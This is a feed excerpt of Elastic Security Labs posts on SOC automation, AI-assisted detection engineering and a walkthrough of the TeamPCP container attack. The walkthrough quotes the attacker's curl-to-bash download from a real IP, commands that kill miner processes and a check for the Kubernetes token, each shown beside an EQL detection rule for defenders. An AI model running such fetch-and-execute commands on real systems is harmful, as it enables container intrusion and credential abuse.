<p>This is the pattern demonstrated in the <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog post</a>: a two-step workflow hands the entire Attack Discovery to an agent, and the agent calls workflow-backed tools to verify malware hashes, search logs, check the on-call schedule, create a case, and spin up a Slack channel. The workflow is the trigger and the safety net. The agent is the brain.</p>
<p>Agents reason. Workflows execute. Together they cover the full range from judgment to action.</p>
<h2>Open by design</h2>
<p>Not every team starts from zero. Some already have automation running in Tines, Splunk SOAR, Palo Alto XSOAR, or another platform. Workflows don't ask you to replace any of your existing tools.</p>
<p>The idea is straightforward: use Workflows for the parts of your automation that are native to Elastic. Alert triage, enrichment from your own indices, case management, and alert status updates. These touch your Elastic data directly, and a native workflow will always be simpler and faster than an external tool making API calls back into Elastic.</p>
<p>For everything else, connectors bridge the gap. We have native connectors for Tines, Resilient, Swimlane, TheHive, D3 Security, Torq, and XSOAR. A workflow can kick off a Tines story, push an incident to Resilient, or trigger any external system via HTTP. Your existing tools handle cross-platform orchestration. Workflows handle what's native. As the capability grows, you can consolidate at your own pace. Nobody's forcing a migration.</p>
<h2>What's here and what's next</h2>
<p>Workflows is available today. Here's what you can build with it today:</p>
<ul>
<li><strong>Alert triggers</strong> connect workflows to detection and alerting rules</li>
<li><strong>Case and alert management</strong> through named Kibana steps (<code>kibana.createCase</code>, <code>kibana.SetAlertsStatus</code>, <code>kibana.addCaseComment</code>, and more)</li>
<li><strong>Direct data access</strong> via Elasticsearch search and ES|QL</li>
<li><strong>39 workflow-compatible connectors</strong> covering threat intel (VirusTotal, AbuseIPDB, GreyNoise, Shodan, URLVoid, AlienVault OTX), ticketing (Jira, ServiceNow), communication (Slack, Teams, PagerDuty, email), SOAR platforms (Tines, Resilient, Swimlane, TheHive, and others), and AI providers</li>
<li><strong>AI steps</strong> for classification, summarization, prompts, and Agent Builder invoking Elastic Agents/Skils</li>
<li><strong>YAML authoring</strong> with autocomplete, validation, and step testing in Kibana</li>
<li><strong>50+ example workflows</strong> on <a href="https://github.com/elastic/workflows">GitHub</a>, including security-specific templates for detection, enrichment, and response</li>
</ul>
<p>What's coming:</p>
<ul>
<li><strong>Visual workflow builder</strong> for drag-and-drop authoring</li>
<li><strong>In-product template library</strong> to browse and install workflows directly in Kibana</li>
<li><strong>Human-in-the-loop</strong> approvals that pause workflows for human input via Slack, email, or the Kibana UI</li>
<li><strong>Natural language authoring</strong> where AI helps translate intent into working workflows</li>
</ul>
<p>Today, authoring is YAML-based. If you've written detection rules or configured CI/CD pipelines, the learning curve is gentle. The editor has built-in autocomplete, validation, and step testing, and the example library gives you templates to start from. A visual builder is coming to make this accessible to a wider audience.</p>
<h2>Get started</h2>
<p>Elastic Workflows is available now. To start building:</p>
<ol>
<li><a href="https://cloud.elastic.co/registration">Start an Elastic Cloud trial</a> or enable Workflows in your existing deployment under <strong>Stack Management &gt; Advanced Settings</strong></li>
<li>Explore the <a href="https://www.elastic.co/kr/docs/explore-analyze/workflows">Workflows documentation</a></li>
<li>Browse the <a href="https://github.com/elastic/workflows">Elastic Workflow Library on GitHub</a> for security templates you can adapt</li>
<li>Read the <a href="https://www.elastic.co/kr/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> for core concepts</li>
<li>See the <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">Chrysalis APT blog</a> for a complete Attack Discovery + Workflows + Agent Builder walkthrough</li>
</ol>
<p>Start with the workflow that would save you the most time tomorrow.</p>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/security-automation-with-elastic-workflows/security-automation-with-elastic-workflows.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Streamlining the Security Analyst Experience]]></title>
            <link>https://www.elastic.co/kr/security-labs/streamlining-the-security-analyst-experience</link>
            <guid>streamlining-the-security-analyst-experience</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Alert Triage, Investigation, and Response with Elastic's Agentic Security Operations Platform.]]></description>
            <content:encoded><![CDATA[<p>The term <strong>Agentic SOC (Security Operations Center)</strong> is one of the most popular concepts in security today. But what does it truly mean in practice, and how does Elastic Security approach this next evolution of security operations?</p>
<p>In simple terms, an Agentic SOC is a security operations center that has deployed AI Agents and corresponding AI Agent Skills to perform SOC-related workflows such as detection engineering, alert triage, incident investigation, escalation, response, and threat hunting. When these workflows are performed by AI agents, they’re often called “Agentic workflows.” These AI Agents and Skills may run natively in a security operations platform like SIEM, XDR, or security analytics, or they may be layered on top of legacy SIEM as an “AI SOC Agent” or “AI SOC analyst”, or they may even be run from an AI Coding Tool.</p>
<p>Regardless of how they are implemented, the shift to the Agentic SOC is not about AI replacing human analysts; it's about transforming how the SOC functions. To keep pace with rapidly evolving attackers, defenders must leverage AI and autonomous agents to respond as quickly as possible. At its core, an Agentic SOC is defined by how a security operations center uses <strong>AI and agents to protect against adversaries</strong>.</p>
<p>Let’s simplify a successful security operations center to three fundamental pillars, all of which the Agentic SOC significantly enhances:</p>
<ol>
<li><strong>Observe:</strong> The foundation of all security is centralized data—aggregating logs and events into one location, which is the core strength of a SIEM solution.</li>
<li><strong>Detect:</strong> This involves deploying core protections like endpoint-based security (XDR, such as Elastic Defend) and security solution-focused detections (cloud, identity data). This technology drives the generation of high-quality alerts. Elastic, for example, ships over <a href="https://elastic.github.io/detection-rules-explorer/"><strong>1,700 pre-built rules</strong></a> for its SIEM by default, not including its XDR solution's endpoint rule library.</li>
<li><strong>Act:</strong> This is the critical final stage of triaging, investigating, and acting on the generated alerts.</li>
</ol>
<h2>Agentic SOC in Action</h2>
<p>Imagine this real-life scenario unfolding in your Security Operations Center using the Elastic security platform. It begins not with a siren, but with a simple, direct Slack notification. Building on our recent <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">blog</a> on Attack Discovery, Workflows, and Agent Builder, let's further examine how Elastic Security can help you respond to an active attack.</p>
<ol>
<li><strong>The Initial Alert and Immediate Action</strong><br />
Your security analyst receives an urgent notification in their team channel. This message isn't just a heads-up; it points directly to an observed, active attack. Crucially, the Elastic Agentic SOC has already taken decisive, pre-emptive action: a vulnerable host has been isolated from the network to contain the threat and limit potential damage. This was all powered by Elastic Workflows and Elastic Agent Builder processing realtime alert and attack data from Elastic.<br />
<img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image5.png" alt="Example analyst notification in Slack after the AI agent has performed initial triage." title="Example analyst notification in Slack after the AI agent has performed initial triage." /></li>
<li><strong>The Centralized Case</strong><br />
The analyst's next step is a click away, moving from Slack directly to the centralized Case within Elastic that was created by the workflow. Elastic Case Management enables the SOC to coordinate the response and provides a single pane of glass into all aggregated critical information:</li>
</ol>
<ul>
<li>
<p><strong>Attack Summary:</strong> A high-level overview detailing what has occurred using Attack Discovery.</p>
</li>
<li>
<p><strong>Attached Alerts:</strong> The specific security alerts that triggered the initial observation.</p>
</li>
<li>
<p><strong>Observables:</strong> A list of suspicious artifacts (IP addresses, file hashes, domains, etc.) collected from the event.</p>
</li>
<li>
<p><strong>Attached Events:</strong> Non-alert events that, while not an alert themselves, provide critical context and are of further interest to the investigation.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image2.png" alt="" /></p>
</li>
</ul>
<ol start="3">
<li><strong>Supporting the Investigation</strong><br />
To support the immediate findings, detailed <strong>Investigations</strong> are attached directly to the Case. These searches allow the analyst to visually and contextually step through the sequence of events leading up to, during, and immediately following the attack.<br />
The Elastic Case also provides instant context by highlighting <strong>Similar cases</strong>. By cross-referencing observables, the system identifies previous incidents involving the same entities or artifacts, providing a deeper understanding of the threat actor's history and potential motives.</li>
<li><strong>The Path to Resolution</strong><br />
The agents don’t just catalog the past; it dictates the future. A clear set of <strong>Next steps and actions</strong> are outlined, with specific team members assigned for review and execution.</li>
</ol>
<p>The analyst then steps through a methodical process reviewing the automated analysis:</p>
<ol>
<li><strong>Reviewing Findings:</strong> Scrutinizing all aggregated data, alerts, and investigations.</li>
<li><strong>Evidence Collection:</strong> Collecting any additional forensic evidence needed for a complete analysis.</li>
<li><strong>Remediation:</strong> Executing manual or automated actions, such as deleting malicious files or killing persistent processes on the isolated host with Elastic Defend.</li>
<li><strong>Final Release:</strong> Eventually, the host is safely released back to the network, but not before additional, targeted rules or policies are automatically applied to prevent a recurrence based on the lessons learned from this incident.<br />
In the Agentic SOC, the analyst moves seamlessly from a high-level alert to a comprehensive investigation to full remediation—all within a unified, intelligent workflow powered by Elastic.</li>
</ol>
<h2>Elastic Security and Core SIEM Workflows</h2>
<p>Before exploring advanced agentic workflows, it's essential to recognize that Elastic Security already provides a comprehensive suite of core capabilities crucial for modern security operations. This foundation begins with the ingestion of security-relevant data, which is automatically normalized to a common schema, ensuring consistency and ease of analysis. The platform offers Extended Detection and Response (XDR) capabilities via Elastic Defend, a robust detection engine built directly into the Elastic Stack, and sophisticated alert workflows that include built-in correlations to reduce noise and surface true threats.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image4.png" alt="" /></p>
<p>Elastic Security further differentiates itself by tightly integrating key operational functions. This includes entity-based threat hunting, machine learning for anomaly detection and behavior analysis, and comprehensive case management for tracking incidents. Finally, the platform provides end-to-end response and forensic capabilities, enabling security teams to move swiftly from initial alert to investigation and remediation, all within a unified, scalable platform.</p>
<h2>Empowering Analysts with Agentic Capabilities</h2>
<h3>AI-Powered Alert Triage and Prioritization</h3>
<p>The Elastic Security Solution integrates AI capabilities via <strong>Agent Builder</strong> to augment and make SOC operations truly agentic. This is where efficiency improvements are most keenly felt:</p>
<ul>
<li><strong>Conversational Triage:</strong> A built-in agent is readily available to Tier 1/2 analysts, allowing them to use conversational commands to query and prioritize open alerts (e.g., &quot;What priority alerts should I review from the last 30 days?&quot;). This is the first entry point for using AI to augment SOC operations.</li>
<li><strong>LLM Agnostic Platform:</strong> A key differentiating feature of Elastic's <strong>Agent Builder</strong> is that it is <strong>LLM agnostic</strong>, allowing organizations to pick their preferred model, even locally running models for privacy or regulatory reasons.</li>
<li><strong>Attack Discovery:</strong> This premier feature moves beyond basic triage. It uses LLM configurations to create <strong>higher-order attack detections</strong>, taking hundreds of open alerts and prioritizing them into a small, manageable subset of known attacks or incidents. This dramatically reduces the impact of alert fatigue.</li>
</ul>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image3.png" alt="" /></p>
<h3>Enriched Investigations</h3>
<p>Once an attack or incident is found, the agent helps start the investigation:</p>
<ul>
<li><strong>Summarization and Enrichment:</strong> The agent can be used to summarize the attack, identify important artifacts, and conduct automated third-party enrichments (like checking VirusTotal). This tailored experience provides a full assessment, including an attack chain, threat intelligence information, related cases, entity risk scoring, and a full investigation guide.</li>
<li><strong>Case Management:</strong> The agent can be instructed to take immediate action, such as generating a security case and notifying the team in Slack, all through simple conversational commands that execute pre-configured workflows.</li>
</ul>
<h3>Automated Response and Threat Hunting</h3>
<p>The true power of the Agentic SOC is realized through action and automation that goes beyond simple conversation:</p>
<ul>
<li>
<p><strong>Workflows and SOAR-like Automation:</strong> Agents can reference and execute <strong>Workflows</strong>, Elastic's SOAR-like automation tool. These workflows allow analysts to take immediate, complex actions. For example, a command like &quot;Please create a case for this attack, and notify my team in Slack&quot; triggers multiple, pre-defined steps. Further critical response actions, such as <strong>isolating a host</strong>, can be executed with a single workflow action while the investigation continues.</p>
</li>
<li>
<p><strong>AI-Assisted Threat Hunting:</strong> AI assists threat hunters by leveraging <strong>Entity Analytics</strong> and pre-built skills. The agent can be asked to find high-risk hosts and users to begin hunting, and then automatically generate specific ESQL queries (e.g., &quot;Please tell me the most uncommon processes executed for each host&quot;) to uncover unusual or malicious activity.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/image1.png" alt="" /></p>
</li>
</ul>
<h3>The Mandate of Automation</h3>
<p>For maximum effectiveness, all these steps,from alert triage and enrichment to case creation and host isolation,can be configured to run <strong>automatically</strong> as an Agentic Alert Triage workflow. This allows the system to solve problems as soon as they are discovered, setting up the human analyst in the loop with a consolidated case and all the necessary findings in a single pane of glass.</p>
<p>This approach delivers substantial <strong>efficiency improvements</strong>, making speed the single most important factor in a modern, Agentic SOC.</p>
<p>Elastic’s Agentic Security Operations Platform</p>
<p>Whether you use our UI, our agents, or your own, Elastic Security provides a strong open foundation for modern security operations. best-in-class data architecture, search, workflows, analytics, detection engineering content, and automation.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/streamlining-the-security-analyst-experience/streamlining-the-security-analyst-experience.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Supercharge Your SOC]]></title>
            <link>https://www.elastic.co/kr/security-labs/supercharge-your-soc</link>
            <guid>supercharge-your-soc</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Detection Engineering in the Era of AI Agents - The New Frontier.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>The landscape of cybersecurity is evolving, and the role of the Detection Engineer (DE) is more critical and demanding than ever. Traditionally, this role involves a comprehensive, end-to-end workflow: from threat modeling and telemetry tuning to writing, testing, and maintaining performance-optimized detection rules to flag malicious behavior.</p>
<p><strong>Elastic Security is purpose-built to streamline this entire workflow, empowering DEs - and anyone involved in security operations - to build, manage, and optimize detection rules at scale. This allows security teams to concentrate their efforts on the most critical task: protecting the organization.</strong></p>
<p>The rise of generative AI and, more specifically, advanced AI <strong>coding agents</strong> like Claude and Cursor, is fundamentally changing and supercharging this workflow.  These tools are no longer just for general software development; they are becoming expert partners for the Security Operations Center (SOC). By integrating the power of conversational AI, these agents can take high-level security requirements and instantly translate them into validated, workable detection logic.</p>
<h1>From Generalist to Elastic Expert: Agent Skills</h1>
<p>Elastic Security is embracing this shift not only by having native AI capabilities built-into our agentic security operations platform , but also by <a href="https://www.elastic.co/kr/search-labs/blog/agent-skills-elastic">open-sourcing <strong>agent skills for 3rd party agentic IDEs</strong></a>, a native platform experience for the entire Elastic ecosystem (Security, Observability, etc.). By loading these skills into any agent runtime, your AI assistant moves from being a generalist to an on-demand expert in Elastic’s tooling. You can then ask your agent to triage alerts or, in this context, expertly create and tune detection rules</p>
<h1>A Use Case Walkthrough: The Notepad++ Attack</h1>
<p>To illustrate the agent’s power, let’s look at a real-world supply chain-based attack involving a backdoor targeting the Notepad++ infrastructure described in Elastic Security Lab’s blog, <a href="https://www.elastic.co/kr/security-labs/speeding-apt-attack-discovery-confirmation-with-attack-discovery-workflows-and-agent-builder">“Speeding APT Attack”</a><strong>.</strong></p>
<h2>Instant Conditional Rules</h2>
<p>A detection engineer’s first step is often to create conditional rules based on known Indicators of Compromise (IOCs). To begin, we can instruct the agent to investigate data within Elastic Security, as evidence of the attack was present in our cluster.</p>
<pre><code>&quot;Can you help me create a detection rule that will detect malicious activity similar
 to what I'm seeing in my Elastic Security deployment involving notepad++.exe 
 and BluetoothService.exe?&quot;
</code></pre>
<p>The agent immediately went to work:</p>
<ul>
<li>It rapidly found process lineage and documented attack details.</li>
<li>It extracted key IOCs and found the corresponding MITRE ATT&amp;CK™ mappings.</li>
<li>It generated two foundational rules: one for a suspicious child process spawned by <strong>Notepad++</strong>, and one focusing on the masqueraded executable.</li>
<li>Crucially, the rules were immediately tested against threat emulation data, confirming multiple successful hits.</li>
</ul>
<p>Each step is happening quickly, and the built-in validation significantly accelerates the 'test and tune' phase.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image2.png" alt="Agent progress initiating creation of conditional detection rules (Claude Code shown)" title="Agent progress initiating creation of conditional detection rules (Claude Code shown)" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image7.png" alt="Agent report after creating two conditional detection rules (Claude Code shown)" title="Agent report after creating two conditional detection rules (Claude Code shown)" /></p>
<p>Let’s take a look at the agent-created rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image3.png" alt="Agent-created rule details appear seamlessly in Elastic Security" title="Agent-created rule details appear seamlessly in Elastic Security" /></p>
<h2>Diving into Advanced ESQL Aggregation</h2>
<p>Conditional logic is great, but modern threats require more behavioral and entity-focused detections. Using Elastic’s powerful piping language, <a href="https://www.elastic.co/kr/docs/reference/query-languages/esql">ES|QL</a> (Elastic Search Query Language), the agent was challenged to create an <strong>aggregation-based rule</strong> that looks for generic, suspicious characteristics across tasks, aggregates them, and assigns a dynamic risk score to host and user entities.</p>
<p>The agent delivered, creating an advanced query that looks for suspicious executables, negates benign directories, and assesses scores based on the activity's risk level. This demonstrates the agent's ability to create sophisticated detections unique to Elastic's capabilities, moving beyond simple lookups to complex entity analytics.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image4.png" alt="Agent creating aggregation-based detection rule (Claude Code shown)" title="Agent creating aggregation-based detection rule (Claude Code shown)" /></p>
<p>Here’s the rule in Elastic Security:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image1.png" alt="More complex aggregation-based rule appears properly in Elastic Security" title="More complex aggregation-based rule appears properly in Elastic Security" /></p>
<h2>Sequential Detections with EQL and Suppression</h2>
<p>To detect multi-stage attacks, a <strong>sequential rule</strong> is essential—if Event A, then Event B, then Event C, then alert. Using the <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/eql">Event Query Language (EQL)</a>, the agent crafted a perfect three-stage sequence for the attack:</p>
<ol>
<li>Unsigned dropper activity.</li>
<li>Service masquerade (implant deployed).</li>
<li>Final execution for persistence.</li>
</ol>
<p>To make the rule more reliable and reduce noise, suppression logic was then added, focusing on limiting alerts per unique Host ID. This quick iteration shows how an agent can help a detection engineer rapidly move from a basic detection to a highly robust, multi-stage rule.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image6.png" alt="Agent creating advanced sequence-based detection rule (Claude Code shown)" title="Agent creating advanced sequence-based detection rule (Claude Code shown)" /></p>
<h2>The LLM-Augmented Query: Summaries in the Alert</h2>
<p>The ultimate demonstration of the new agentic workflow is using <a href="https://www.elastic.co/kr/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion">Elastic’s <strong>ESQL COMPLETION syntax</strong></a>. This feature allows an inference model to be referenced <em>directly within the query</em>.</p>
<p>The prompt asked the agent to:</p>
<pre><code>Based off this recent elastic blog,
 https://www.elastic.co/kr/security-labs/beyond-behaviors-ai-augmented-detection-engineering-with-esql-completion, 
 create a rule that incorporates a COMPLETION command with my  default inference 
 model that will summarize findings from attack into one &quot;esql.summary&quot;
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/image5.png" alt="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" title="Agent creating advanced detection rule with included AI Summary (Claude Code shown)" /></p>
<p>The result? The generated rule didn't just fire an alert; it natively included an <strong>ES|QL summary row</strong> in the alert itself:</p>
<blockquote>
<p>This telemetry shows a masquerading technique where a process named &quot;BluetoothService.exe&quot; is executing from a user's AppData directory with a PE original name of &quot;BDSubWiz.exe&quot; (a legitimate file mismatch), running as SYSTEM with service-like characteristics including spawning from services.exe, indicating persistence establishment (MITRE ATT&amp;CK T1036.004 Masquerading and T1543 Service Persistence). The executable's location in a user directory, combined with SYSTEM-level execution, service persistence indicators, and the name/PE mismatch across multiple events, suggests Defense Evasion and Persistence stages. This represents high severity due to successful SYSTEM-level persistence with active defense evasion through masquerading.</p>
</blockquote>
<p>This cuts triage time dramatically, as analysts no longer need to pivot to a separate runbook to understand the context and severity of the alert.</p>
<h1>The Agentic SOC is Here</h1>
<p>The collaboration between AI agents and the Elastic Security solution provides a glimpse into Elastic’s <a href="https://www.elastic.co/kr/security-labs/why-2026-is-the-year-to-upgrade-to-an-agentic-ai-soc"><strong>Agentic SOC</strong></a> of the future. It’s a world where detection engineers can have a conversation, define their intent, and instantly generate, test, and deploy highly sophisticated, context-rich detection rules. This is not about replacing the human expert, but about augmenting their knowledge and accelerating their workflow, allowing them to focus on high-value threat intelligence and modeling.</p>
<h2>Getting started</h2>
<p><strong>Before you get started:</strong> AI coding agents operate with real credentials, real shell access, and often the full permissions of the user running them. When those agents are pointed at security workflows, the stakes are higher: you're handing an automated system access to detection logic, response actions, and sensitive telemetry. Every organization's risk profile is different. Before enabling AI-driven security workflows, evaluate what data the agent can access, what actions it can take, and what happens if it behaves unexpectedly</p>
<p>Don't have an Elasticsearch cluster yet? Start an <a href="https://cloud.elastic.co/registration">Elastic Cloud free trial</a>. It takes about a minute to get a fully configured environment.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/supercharge-your-soc/supercharge-your-soc.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - TeamPCP Container Attack Scenario]]></title>
            <link>https://www.elastic.co/kr/security-labs/teampcp-container-attack-scenario</link>
            <guid>teampcp-container-attack-scenario</guid>
            <pubDate>Fri, 20 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This publication provides a real-world walkthrough of TeamPCP's multi-stage container compromise, demonstrating how Elastic's D4C surfaces runtime signals across each stage of the attack chain.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>In <a href="https://www.elastic.co/kr/security-labs/getting-started-with-defend-for-containers">the previous article</a>, we examined how Defend for Containers (D4C) is deployed, how its policy model operates, and how its runtime telemetry is structured. With that foundation in place, the next step is to move from configuration and field analysis to applied detection engineering.</p>
<p>This post walks through a realistic container attack scenario based on the TeamPCP cloud-native ransomware operation, as <a href="https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware">documented by Flare</a>. Rather than analyzing isolated techniques in abstraction, we follow the attack as it unfolds inside a containerized environment and examine how each stage manifests in D4C telemetry.</p>
<p>When mapped to MITRE ATT&amp;CK, the activity in this scenario spans nearly the entire attack lifecycle. The intrusion progresses from execution and discovery inside the container to persistence, lateral movement, command-and-control activity, and ultimately impact.</p>
<p>By mapping these behaviors to concrete detection logic, this article demonstrates how D4C enables detection engineers to identify container compromise not as isolated suspicious commands, but as part of a structured attack chain.</p>
<h2>TeamPCP - an emerging force in the cloud native and ransomware landscape</h2>
<p>This scenario walks through the container compromise and propagation stage of the TeamPCP cloud-native ransomware operation, recently researched and documented by Flare. Rather than treating this as an abstract case study, the flow below mirrors how the attack plays out in practice and shows how D4C telemetry and pre-built detections surface each stage of the intrusion.</p>
<p>At a high level, the threat actor’s objectives in this stage are:</p>
<ol>
<li>Gain interactive code execution inside a container</li>
<li>Determine whether the workload runs in Kubernetes</li>
<li>Establish durable execution and persistence</li>
<li>Propagate laterally across pods and nodes</li>
<li>Prepare the environment for large-scale monetization (mining, ransomware, or resale)</li>
</ol>
<p>Each of these goals leaves behind observable runtime behavior that D4C is well-positioned to detect.</p>
<h3>Stage 1 – Initial execution via download and pipe-to-shell</h3>
<p>The attack begins with a familiar but effective technique: downloading and immediately executing a script via a shell pipeline.</p>
<pre><code class="language-shell">curl -fsSL http://67.217.57[.]240:666/files/proxy.sh | bash
</code></pre>
<p>The intent here is to gain immediate execution while avoiding file creation. This is a classic tradecraft choice: no payload written to disk, no obvious artifact to scan.</p>
<p>From D4C's perspective, this still results in a highly suspicious runtime pattern. An interactive <code>curl</code> process executes inside a container and immediately spawns a shell interpreter. The parent–child relationship, command line, and container context are all captured.</p>
<pre><code class="language-sql">sequence by process.parent.entity_id, container.id with maxspan=1s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and 
   process.name in (&quot;curl&quot;, &quot;wget&quot;)]
  [process where event.action in (&quot;exec&quot;, &quot;end&quot;) and
   process.name like (
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;,
     &quot;python*&quot;, &quot;perl*&quot;, &quot;ruby*&quot;, &quot;lua*&quot;, &quot;php*&quot;
   ) and
   process.args like (
     &quot;-bash&quot;, &quot;-dash&quot;, &quot;-sh&quot;, &quot;-tcsh&quot;, &quot;-csh&quot;, &quot;-zsh&quot;, &quot;-ksh&quot;, &quot;-fish&quot;,
     &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;,
     &quot;/bin/bash&quot;, &quot;/bin/dash&quot;, &quot;/bin/sh&quot;, &quot;/bin/tcsh&quot;, &quot;/bin/csh&quot;,
     &quot;/bin/zsh&quot;, &quot;/bin/ksh&quot;, &quot;/bin/fish&quot;,
     &quot;/usr/bin/bash&quot;, &quot;/usr/bin/dash&quot;, &quot;/usr/bin/sh&quot;, &quot;/usr/bin/tcsh&quot;,
     &quot;/usr/bin/csh&quot;, &quot;/usr/bin/zsh&quot;, &quot;/usr/bin/ksh&quot;, &quot;/usr/bin/fish&quot;,
     &quot;-busybox&quot;, &quot;busybox&quot;, &quot;/bin/busybox&quot;, &quot;/usr/bin/busybox&quot;,
     &quot;*python*&quot;, &quot;*perl*&quot;, &quot;*ruby*&quot;, &quot;*lua*&quot;, &quot;*php*&quot;, &quot;/dev/fd/*&quot;
   )]
</code></pre>
<p>This rule detects the download → interpreter execution pattern, even when no file is written to disk. Detecting this step is critical, as it is the first reliable indicator of hands-on-keyboard activity within a container.</p>
<p>Upon execution, TeamPCP scans the target system for competing mining processes and uses the <code>pkill</code> command to terminate them.</p>
<pre><code class="language-shell">pkill -9 xmrig 2&gt;/dev/null || true
pkill -9 XMRig 2&gt;/dev/null || true
curl -fsSL http://update.aegis.aliyun.com/download/uninstall.sh | bash 2&gt;/dev/null || true
</code></pre>
<p>The competitor-killing logic from TeamPCP is very limited in comparison to its competitors, focusing only on <code>xmrig</code>. Manual process killing in containers is uncommon, especially when done via interactive processes.</p>
<pre><code class="language-sql">process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and
container.id like &quot;*?&quot; and 
(
  process.name in (&quot;kill&quot;, &quot;pkill&quot;, &quot;killall&quot;) or
  (
    /*
       Account for tools that execute utilities as a subprocess,
       in this case the target utility name will appear as a process arg
    */
    process.name in (
      &quot;bash&quot;, &quot;dash&quot;, &quot;sh&quot;, &quot;tcsh&quot;, &quot;csh&quot;, &quot;zsh&quot;, &quot;ksh&quot;, &quot;fish&quot;, &quot;busybox&quot;
    ) and
    process.args in (
      &quot;kill&quot;, &quot;/bin/kill&quot;, &quot;/usr/bin/kill&quot;, &quot;/usr/local/bin/kill&quot;,
      &quot;pkill&quot;, &quot;/bin/pkill&quot;, &quot;/usr/bin/pkill&quot;, &quot;/usr/local/bin/pkill&quot;,
      &quot;killall&quot;, &quot;/bin/killall&quot;, &quot;/usr/bin/killall&quot;, &quot;/usr/local/bin/killall&quot;
    )
  )
)
</code></pre>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml">Payload Execution via Shell Pipe Detected by Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/impact_process_killing.toml">Process Killing Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon initial access:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image4.png" alt="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" title="Figure 1: Detection rules triggering for stage 1: Initial Execution via Download and Pipe to Shell" /></p>
<h3>Stage 2 – Kubernetes environment discovery</h3>
<p>After gaining execution, the attacker checks whether the container is running inside Kubernetes by testing for a service account token:</p>
<pre><code class="language-shell">if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]
</code></pre>
<p>This check determines whether the attack can expand beyond the current container. If the token exists, the attacker proceeds to abuse the Kubernetes API. Additionally, the dropped scripts enumerate environment variables and several sensitive file locations, triggering numerous discovery-related alerts.</p>
<p>The detection rules that triggered in this stage are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_service_account_namespace_read.toml">Service Account Namespace Read Detected via Defend for Containers</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/discovery_environment_enumeration.toml">Environment Variable Enumeration Detected via Defend for Containers</a></li>
